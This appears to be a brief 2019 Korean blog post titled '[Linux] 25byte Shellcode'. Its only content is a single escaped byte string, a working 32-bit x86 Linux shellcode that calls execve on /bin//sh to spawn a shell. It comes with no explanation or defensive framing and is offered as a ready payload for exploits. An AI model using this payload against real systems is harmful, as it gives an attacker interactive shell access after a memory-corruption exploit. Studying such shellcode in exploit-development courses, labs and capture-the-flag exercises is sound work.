Linux/ETC
[Linux] 25byte Shellcode
hellojuntae
2019. 3. 24. 13:47
1 2 3 | //25바이트 쉘코드 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80 | cs |